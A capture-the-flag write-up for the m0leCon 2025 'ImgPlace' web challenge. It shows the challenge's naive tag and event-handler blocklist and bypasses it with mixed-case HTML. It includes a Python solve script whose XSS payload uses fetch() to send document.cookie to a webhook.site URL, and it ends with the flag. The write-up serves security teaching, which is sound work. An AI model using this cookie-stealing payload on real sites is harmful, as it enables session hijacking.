M0lecon2025beginner | ImgPlace

Introduction#

We have a very simple application where we are allowed to register and log in and then we can upload images via url and associated description

Source#

The source is only parsable by devtools from the browser, and we can see that in the pic.js file we have a function that sanitizes the image description

1
"use strict";
2

3
(async () => {
4
    const picPhoto = document.getElementById("picPhoto");
5
    const picDesc = document.getElementById("picDesc");
6

7
    const r = await fetch("/api/pic/" + window.picId);
8

9
    if (r.ok) {
10
        const data = await r.json();
11
        picPhoto.src = data.src;
12

13
        // We need to block dangerous things!
14
        const blocklist = [
15
            "<comment",
16
            "<embed",
17
            "<link",
18
            "<listing",
19
            "<meta",
20
            "<noscript",
21
            "<object",
22
            "<plaintext",
23
            "<script",
24
            "<xmp",
25
            "<style",
26
            "<applet",
27
            "<iframe",
28
            "<img",
29
            "onload",
30
            "onblur",
31
            "onclick",
32
            "onerror",
33
            "href",
34
            "javascript",
35
            "window",
36
            "src",
37
        ];
38
        let description = String(data.description);
39
        blocklist.forEach((word) => {
40
            description = description.replace(word, "");
41
        });
42

43
        picDesc.innerHTML = description;
44
    } else {
45
        if (r.status == 401) {
46
            window.location.href = "/profile";
47
        } else {
48
            alert("Unable to load photo!");
49
        }
50
    }
51
})();

We can see this trivially from the code that takes ById elements are taken and the word is deleted.

Solution#

There are really several solutions I used the simplest one which is to take advantage of the fact that the replace is case sensitive and no lowercase is done in the code to my description

1
#!/usr/bin/python3
2
import random
3
import string
4

5
import requests
6
from bs4 import BeautifulSoup
7

8
BASE_URL = "https://imgplace.challs.m0lecon.it"
9
URL_HOOK = "https://webhook.site/6a1df142-d272-4e11-8937-dbd81a33e9d2"
10

11
def string_generator(length):
12
    return ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(length))
13

14
s = requests.Session()
15

16
def register(username, password):
17
    r = s.post(f"{BASE_URL}/register", data={"username": username, "password": password,"confirmPassword":password})
18

19
    if r.status_code != 200:
20
        print("[+] Error register")
21
        print(r.text)
22
        exit(1)
23
    else:
24
        print("[+] Register success")
25

26
def login(username, password):
27
    r = s.post(f"{BASE_URL}", data={"username": username, "password": password})
28
    if r.status_code != 200:
29
        print("[+] Error login")
30
        print(r.text)
31
        exit(1)
32
    else:
33
        print("[+] Login success")
34

35
def new(payload):
36
    r = s.post(f"{BASE_URL}/new", data={"url": URL_HOOK, "description": payload})
37
    if r.status_code != 200:
38
        print("[+] Error new image")
39
        print(r.text)
40
        exit(1)
41
    else:
42
        print("[+] New Image Success")
43

44

45
def main():
46
    username,password = string_generator(10),string_generator(10)
47
    print(f"Username: {username} Password : {password}")
48
    register(username,password)
49
    login(username,password)
50
    payload = "<ImG SrC=x OnError=fetch(`"+URL_HOOK+"?q=${document.cookie}`)>"
51
    new(payload=payload)
52
    print("[+] Done")
53
    print("[+] Now login to the website go to the image complete the captcha and you will get the flag on the webhook")
54

55

56
if __name__ == "__main__":
57
  main()
58

59
# goodluck by @akiidjk

flag: ptm{n3v3r_tRvST_t3g_bL0ckL1sts}